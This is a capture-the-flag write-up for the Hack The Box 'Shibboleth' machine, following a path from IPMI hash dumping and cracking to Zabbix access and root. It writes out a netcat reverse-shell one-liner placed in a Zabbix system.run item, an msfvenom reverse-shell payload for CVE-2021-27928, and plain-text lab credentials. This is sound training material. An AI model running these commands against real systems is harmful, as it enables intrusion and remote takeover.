[MEDIUM] Shibboleth

Shibboleth icon

Enumeration

NMAP

Starting to port scan using nmap. The following command is used to check the open ports only. 

nmap -p- --min-rate 10000 10.10.11.124 -vvv 2>&1 | grep "Discovered open" | awk '{ print $4 }' | cut -d "/" -f 1


Then the output is them passed to another nmap scan but this time it will do banner grabbing. 


# Nmap 7.91 scan initiated Tue Mar 15 12:27:25 2022 as: nmap -sV -sC -p 80 -vvv -oA nmap-output-services.tcp 10.10.11.124
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up, received echo-reply ttl 63 (0.35s latency).
Scanned at 2022-03-15 12:27:25 EDT for 15s

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 15 12:27:40 2022 -- 1 IP address (1 host up) scanned in 14.81 seconds


Quite unusual for an HTB box but it only has one open port which is port 80. This is the snip of the fron page looks like.
Shibboleth Front Page
There is nothing here but a simple static page. Next is to try guessing any virtual hosts. I used ffuf.

VHOST Enumeration

ffuf -u http://shibboleth.htb/ \
    -w <>/Discovery/DNS/subdomains-top1million-110000.txt \
    -H Host: FUZZ.shibboleth.htb -o vhosts -fc 302


-fc 302 is added since without it any subdomain send to the server will redirect to the main site. We have to filter out status codes 302. Once the scan is finished, here is the result from the output file: 

cat ffuf/vhost/vhosts | jq | grep shibboleth.htb | grep "host"


Shibboleth vhosts
As can be seen, 3 subdomains can be seen:


This is what they all look like when visited.
Shibboleth vhosts front page

UDP Scanning

We don’t have any credentials to enter in the login page. Simple admin/password and other usual creds and even default zabbix username password (Admin/zabbix) doesn’t work. We have to enumerate the box more. UDP enumeration hasn’t been done yet.
Using the following command to enumerate UDP: 

sudo nmap -sU --min-rate 10000 shibboleth.htb -vvv


Port 623 is open.
Port UDP 623 open
Next step is to banner grab. 

sudo nmap -sU -sC --min-rate 10000 -p 623 shibboleth.htb -vvv


623 result
Looks like nmap doesn’t showed much result that is needed. Looking from this site, it seems that this is an IPMI service. Also hacktricks has a great amount of information on how to enumerate and exploit this kind if service.
We can use the metasploit console and IPMI modules

Exploiting IPMI Service

msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts shibboleth.htb
msf6 auxiliary(scanner/ipmi/ipmi_version) > run


msfconsole ipmi version
We want to check if the IPMI service is vulnerable to cipher 0. 

msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set rhosts shibboleth.htb
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run


msfconsole ipmi cipher zero
As can be seen it is vulnerable. Let’s dump the hashes. 

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts shibboleth.htb
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run


msfconsole dump hashes
We can save the hash part and try cracking it with hashcat 

hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt


In hashcat the mode for IPMI2 RAKP HMAC-SHA1 is 7300.
hashcat crack

Logging In into Zabbix Dashboard

Creds is Administrator:ilovepumkinpie1. We can test this credentials on the vhosts discovered.
zabbix login
As can be seen the creds worked.

Running Script Items in Zabbix Dashboard

In Zabbix documentation, you can create an item with a supported key system.run that executes command on zabbix agent. To do this, from the home dashboard, go to Configuration
conf
Then, select Hosts
conf
Then the Hosts page will be loaded. There will be list of hosts and in this case there is only one which is shibboleth.htb. Click the items
conf
Then on the upper left, there is an button Create Item. Click it.
conf
A form will pop up. The Name field can be of any value. The important here is the key. The following Key value is set: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 9999 >/tmp/f, nowait]. This is a reverse shell
conf
To execute it, Select Test…
conf
…then click Get value and Test. It should execute the command.
conf
conf

Whoami and Privesc to ipmi-svc

After turning the shell into an interactive TTY, we can now snoop around. Turns out we are zabbix as user but the user goal for this is ipmi-svc.
user zabbix
We need to privesc to ipmi-svc. Trying the same password from the Zabbix dashboard. ipmi-svc:ilovepumkinpie1
user ipmi-svc
It turns out same password was used. We got user.

Root Privesc

Zabbix configuration in /etc/zabbix

Checking the environmental variables of ipmi-svc there is a zabbix conf in one of them
user ipmi-svc.
Let’s check if there are other configuration files we can look at in /etc/zabbix
user ipmi-svc
The last 2 files seems to be interesting and can only be read by ipmi-svc. Turns out this conf has mysql password and username.
user ipmi-svc
Let’s try this creds on mysql: zabbix:bloooarskybluh
user ipmi-svc
Nice! The creds worked. Notice that the copyright is in 2000, 2018. This mariadb may be out of date and possibly vulnerable.

Running Processes - Mysql

When running ps -aef --forest, it can be seen that the mysql server is running as root.
user ipmi-svc
We also noticed that the mysql may be out of date. Let’s check then if there are any existing exploit for mysql MariaDB 10.3.25 MariaDB. Turns out an exploit procedure exists - CVE-2021-27928 for this version of mysql MariaDB.

Mysql Exploitation (CVE-2021-27928)

Following the exploitation process. Creating the .so through msfvenom 

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=10000 -f elf-so -o CVE-2021-27928.so


user ipmi-svc
Now we have to transfer the .so file to the target host. We can serve it through http.server. After getting it we have to login to mysql and set wsrap_provider to the .so file. We should be able to execute commands as root
user ipmi-svc
user ipmi-svc
The exploit worked! We have pwned the Shibboleth Machine.